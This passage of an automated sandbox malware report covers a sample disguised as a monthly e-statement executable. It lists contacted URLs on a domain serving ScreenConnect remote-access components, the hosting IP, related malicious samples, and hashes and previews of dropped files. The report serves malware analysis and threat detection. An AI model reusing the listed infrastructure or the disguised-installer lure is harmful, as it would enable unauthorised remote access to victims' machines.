                                                                                                                                                                unknown
                                                                                                                                                                https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationre=msildfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2076123454.0000021CA2756000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287628866.0000021CA1E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000007.00000002.3288771862.0000021CA2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000007.00000002.3288771862.0000021CA2737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAAsvchost.exe, 00000007.00000003.2179818124.0000021CA2729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000002.00000002.2973425425.0000025D1D740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationO$ScreenConnect.WindowsClient.exe, 00000009.00000002.2446849268.000000000116F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applications_4c015cYScreenConnect.WindowsClient.exe, 00000009.00000002.2450825979.000000001B8AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationg=ScreenConnect.WindowsClient.exe, 00000009.00000002.2450913714.000000001B8BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.exeGdfsvc.exe, 00000002.00000002.2982317556.0000025D3955E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://upx.sf.netAmcache.hve.5.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exeddfsvc.exe, 00000002.00000002.2981642219.0000025D37CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#Screedfsvc.exe, 00000002.00000002.2973425425.0000025D1D9AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://g.live.com/odclientsettings/Prod/C:edb.log.6.drfalse
                                                                                                                                                                                        high
IP | Domain | Country | ASN | ASN Name | Malicious
194.59.30.201 | voicemail-lakeleft.top | Germany | 30823 | COMBAHTONcombahtonGmbHDE | false

IP
127.0.0.1
                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                        Analysis ID:1551950
                                                                                                                                                                                        Start date and time:2024-11-08 11:00:10 +01:00
                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                        Overall analysis duration:0h 7m 21s
                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                        Report type:full
                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                        Number of analysed new started processes analysed:14
                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                        Technologies:
                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                        Sample name:monthly-eStatementForum120478962.Client.exe
                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                        Classification:mal51.evad.winEXE@18/76@2/2
                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                        • Successful, ratio: 66.7%
                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                        • Successful, ratio: 60%
                                                                                                                                                                                        • Number of executed functions: 203
                                                                                                                                                                                        • Number of non-executed functions: 39
                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.190.159.23, 20.190.159.64, 20.190.159.0, 40.126.31.73, 40.126.31.69, 20.190.159.2, 40.126.31.67, 20.190.159.71, 199.232.214.172, 192.229.221.95, 184.28.90.27, 20.42.65.92, 2.22.50.144, 2.22.50.131
                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, cacerts.digicert.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                        • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 1440 because it is empty
                                                                                                                                                                                        • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 5764 because it is empty
                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                        • VT rate limit hit for: monthly-eStatementForum120478962.Client.exe
Time | Type | Description
05:01:02 | API Interceptor | 437277x Sleep call for process: dfsvc.exe modified
05:01:02 | API Interceptor | 1x Sleep call for process: monthly-eStatementForum120478962.Client.exe modified
05:01:03 | API Interceptor | 2x Sleep call for process: svchost.exe modified
05:01:22 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
194.59.30.201 | 9YOOBuBZtj.exe | malicious | ScreenConnect Tool
194.59.30.201 | 6Zx9GI028y.exe | malicious | ScreenConnect Tool
194.59.30.201 | 4ZVhm9dOfO.exe | malicious | ScreenConnect Tool
194.59.30.201 | y4FSQMICGJ.exe | malicious | ScreenConnect Tool
194.59.30.201 | 9YOOBuBZtj.exe | malicious | ScreenConnect Tool
194.59.30.201 | 6Zx9GI028y.exe | malicious | ScreenConnect Tool
194.59.30.201 | y4FSQMICGJ.exe | malicious | ScreenConnect Tool
194.59.30.201 | 75kTq6Y4Ck.exe | malicious | ScreenConnect Tool
194.59.30.201 | 4ZVhm9dOfO.exe | malicious | ScreenConnect Tool
Match | Associated Sample Name / URL | Detection | Threat Name | Context
popwee2.zapto.org | 9YOOBuBZtj.exe | malicious | ScreenConnect Tool | 194.59.30.201
popwee2.zapto.org | 6Zx9GI028y.exe | malicious | ScreenConnect Tool | 194.59.30.201
popwee2.zapto.org | 4ZVhm9dOfO.exe | malicious | ScreenConnect Tool | 194.59.30.201
popwee2.zapto.org | 9YOOBuBZtj.exe | malicious | ScreenConnect Tool | 194.59.30.201
popwee2.zapto.org | 6Zx9GI028y.exe | malicious | ScreenConnect Tool | 194.59.30.201
popwee2.zapto.org | y4FSQMICGJ.exe | malicious | ScreenConnect Tool | 194.59.30.201
popwee2.zapto.org | 4ZVhm9dOfO.exe | malicious | ScreenConnect Tool | 194.59.30.201
voicemail-lakeleft.top | 9YOOBuBZtj.exe | malicious | ScreenConnect Tool | 194.59.30.201
voicemail-lakeleft.top | 6Zx9GI028y.exe | malicious | ScreenConnect Tool | 194.59.30.201
voicemail-lakeleft.top | 4ZVhm9dOfO.exe | malicious | ScreenConnect Tool | 194.59.30.201
voicemail-lakeleft.top | y4FSQMICGJ.exe | malicious | ScreenConnect Tool | 194.59.30.201
voicemail-lakeleft.top | 9YOOBuBZtj.exe | malicious | ScreenConnect Tool | 194.59.30.201
voicemail-lakeleft.top | 6Zx9GI028y.exe | malicious | ScreenConnect Tool | 194.59.30.201
voicemail-lakeleft.top | y4FSQMICGJ.exe | malicious | ScreenConnect Tool | 194.59.30.201
voicemail-lakeleft.top | 75kTq6Y4Ck.exe | malicious | ScreenConnect Tool | 194.59.30.201
voicemail-lakeleft.top | 4ZVhm9dOfO.exe | malicious | ScreenConnect Tool | 194.59.30.201

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.8307089514422711
Encrypted:false
SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugl:gJjJGtpTq2yv1AuNZRY3diu8iBVqFn
MD5:297C2A079A9BD8E9FDAEF1D4F25127BD
SHA1:46D21AC84675DDF4BC9BB1AFAC65CD11DFD6BBCA
SHA-256:8F14E3844D3837C8A15EB10E1A3BB652565AE09881EF610226691FECB4C91BB4
SHA-512:B6182B38EBABABF30568BA9EBA23DF74ADA6ECCB2D0197C503ED78F0C67C9A2529D4C34C4033DFF6DC4A70C80649EB82ED42800C62BBB566C8E0C1565E5C132E
Malicious:false

Process:C:\Windows\System32\svchost.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x25e71e2a, page size 16384, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.6585765152302204
Encrypted:false
SSDEEP:1536:hSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:haza9v5hYe92UOHDnAPZ4PZf9h/9h
MD5:D57F42B976D10AEB1ABF3BBBC0D8700A
SHA1:1A2BF2C22E35370FBBCFA2A110340248CD059E00
SHA-256:E288F2805894ECE8B3A937252801DF46D82BAA12250D1E90D5F52852F6CDA779
SHA-512:92F344960C1FE434ACE524707A538D427FCFDDA7A486336F7D64C5F3DE2A81E761779B9A9E971CC1ACBA23FB45AA051EAC417EAE2E2E1A3A78FD3C863ED179C8
Malicious:false

Process:C:\Windows\System32\svchost.exe
File Type:OpenPGP Public Key
Category:dropped
Size (bytes):16384
Entropy (8bit):0.08036169633905144
Encrypted:false
SSDEEP:3:YKl/llKYeRmXHbGuAJkhvekl1onQKFlAllrekGltll/SPj:Y+//KzRabrxlOn3AJe3l
MD5:D658B17990F495395F83C0EA70935543
SHA1:8E97C946D1606973C727274B248FE1A2047261D4
SHA-256:1E99849F6A259CFBF0797BAD63E47613480C68230913F31C563400BC2995DF0E
SHA-512:60E4B82206803DE9EE29FDDC641E711E00BE0919D0E0335E5EF70C09DACEAEFB71B53B1140E4E5BA29E07095CBB0165A06ECBE3D3C11FE84D4FB242BD5788D05
Malicious:false

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.9422405274480878
Encrypted:false
SSDEEP:96:XHFWgVQMQLs6fhqvGXyf5QXIDcQvc6QcEVcw3cE/XhB+HbHg/Jg+OgBCXEYcI+10:XkLIy0BU/wjq0ozuiFFZ24IO8T
MD5:E99F8D3D9BAD565542EACB359EB10414
SHA1:6FDCBC34D4F03435EB3061D6CCDD0B25E97597EB
                                                                                                                                                                                                                                                  SHA-256:70931154134CAD55AEA0AB0D8FDF7AD4EE68D4F2CDC9AC9FCC498DCC84079D0D
                                                                                                                                                                                                                                                  SHA-512:45D9DF6C7B9F16BC776123E1530FD4530DFA481E785ADF96BDA1121357B862CB6CF868788208207F264EBBEFE53910615731FDE079C14588B0D0CE6DFFE09A50
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.5.3.3.6.6.3.4.0.0.2.2.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.5.3.3.6.6.3.9.3.1.4.7.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.7.3.6.7.0.f.-.a.7.7.a.-.4.7.b.b.-.a.4.5.3.-.d.c.4.0.3.b.5.7.c.0.6.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.f.2.f.8.1.a.-.8.5.e.e.-.4.f.2.a.-.8.0.c.e.-.8.9.d.0.4.6.4.1.2.7.1.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.o.n.t.h.l.y.-.e.S.t.a.t.e.m.e.n.t.F.o.r.u.m.1.2.0.4.7.8.9.6.2...C.l.i.e.n.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.d.4.-.0.0.0.1.-.0.0.1.4.-.e.4.8.2.-.c.7.1.c.c.5.3.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.2.5.3.e.d.2.8.1.b.3.2.6.b.1.a.6.8.6.a.4.9.5.f.e.9.6.d.0.a.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.4.e.b.9.6.5.6.e.d.e.1.f.e.d.2.3.f.d.a.e.b.6.7.8.1.5.a.f.c.d.4.8.9.d.e.d.0.
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Fri Nov 8 10:01:03 2024, 0x1205a4 type
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):83910
                                                                                                                                                                                                                                                  Entropy (8bit):1.6442408006053106
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:KA7tRlX7jamOhI/DgtqBfMuMM96abQMnev4o/bfW8vOhVoOIbpfiy1kP:fJRYxhI/ktir9L8K6OhVQKy1k
                                                                                                                                                                                                                                                  MD5:7C2967B17975CB35DEABC1C6778B0E72
                                                                                                                                                                                                                                                  SHA1:8DFD26993B42DD1C81636ADC47E35BB7976BBC52
                                                                                                                                                                                                                                                  SHA-256:6AFBA391FF38C9D8535DD446691520D161CBF8CF175074D7D20CDD2AAA4C0E33
                                                                                                                                                                                                                                                  SHA-512:7E284F2CFDED63DD70BF6786EF8DABFF9851D7164333022902D06EA54D1937828F3DC29143946FF1B0F29DC00AC92F62DA8336918C76EE9FE466EA19582BFBD3
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):8450
                                                                                                                                                                                                                                                  Entropy (8bit):3.696105525464364
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJuV6C6YEIaSU9SggmfwWmprN89bNbsfgvm:R6lXJc6C6YE1SU9SggmfwWRNgf1
                                                                                                                                                                                                                                                  MD5:7045D9D0C4661CF5FDD85564FE308525
                                                                                                                                                                                                                                                  SHA1:8319CC854135F348D20CD8F27A36DDBC26A00CA9
                                                                                                                                                                                                                                                  SHA-256:03BCDEE5BEDF876E7C14C92F054D23B293F513889D2523BADC17E1FDFBB40412
                                                                                                                                                                                                                                                  SHA-512:2117F10A175A4C6B49FFEA78C634013D5D36D23A4AE712AB66FEFAD24F464305CDFEC587C4AC7BE883C34AE0BD4FD8B6F553C87C0AEA349CB6EC6834C6ED0D60
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.6.0.<./.P.i.
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4738
                                                                                                                                                                                                                                                  Entropy (8bit):4.525926181500605
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zsgJg77aI9p2WpW8VY+Ym8M4JHAxArEFD+q80AXhupqwzAFXAF3d:uIjfmI7TX7VCJamup1qO3d
                                                                                                                                                                                                                                                  MD5:D7625E95D90263B689F13E1FD154E741
                                                                                                                                                                                                                                                  SHA1:D34C6DD5EBFC102B1AADB3829E2DDB6E25C09D44
                                                                                                                                                                                                                                                  SHA-256:BA2682C11920D166E582618FF357ED17A92384A40EC906A5E4C663512DC05673
                                                                                                                                                                                                                                                  SHA-512:C26D6F596984469A02B3140ED00BF755F57C8E0ED149BB0C2565D664DA61501DBCA6ED35A4427755FA77320DD06849A67E86FD477C6A4DD3E72EAAE917DCE6C6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="578943" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):78990
                                                                                                                                                                                                                                                  Entropy (8bit):3.066430991149799
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:aN2Wum9rlzqxRjibC0rt3LTzFHmaYfMf7571w:aN2Wum9rlzqxRjibC0rt3LTzFHmaYfMk
                                                                                                                                                                                                                                                  MD5:2871A127EEBF25011D973A1949D5CCD7
                                                                                                                                                                                                                                                  SHA1:209B318752B79D6923449E5B592D494F6FA5238D
                                                                                                                                                                                                                                                  SHA-256:EB2CB398D493F35E6953B06B49534925A82F181E72E3C77E2D6A03D4E9AD0271
                                                                                                                                                                                                                                                  SHA-512:3FD6804C2947A314DAFA9D3A3083704BDE518FB6A9C4E2D753BDF16246CF2D081A88D95CEAF7C3FC5875666BE90B3792554D102956D3C8D1437DD649CF8F38C0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13340
                                                                                                                                                                                                                                                  Entropy (8bit):2.6837838614035
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:TiZYWVU/LC+0SHYoYZqWIjuHFYEZ6wt8iwL8tjwWJ6A2a/OvHMMpa3IEL3:2ZDV+P/jjAca/OEMpaYEL3
                                                                                                                                                                                                                                                  MD5:7DD783698A3DD919D2BF1F600A15C45B
                                                                                                                                                                                                                                                  SHA1:B3FD6D7DAE5EDF83F5EC3EEBDC3B84EA6305119D
                                                                                                                                                                                                                                                  SHA-256:125A90F3E1E4046AC09E070CE5D12EEDD7A5567D9CA03619B1B58FA7D9471667
                                                                                                                                                                                                                                                  SHA-512:D825A4FED48CBC3C7B0AAD2BDFC45319AB57C3FD463196E890D8438F2AD7B596CE678BEE642E4797B8AF1815C9C186B47EED8DEDEB68A2CC3B27458BF1FCDF3F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4770
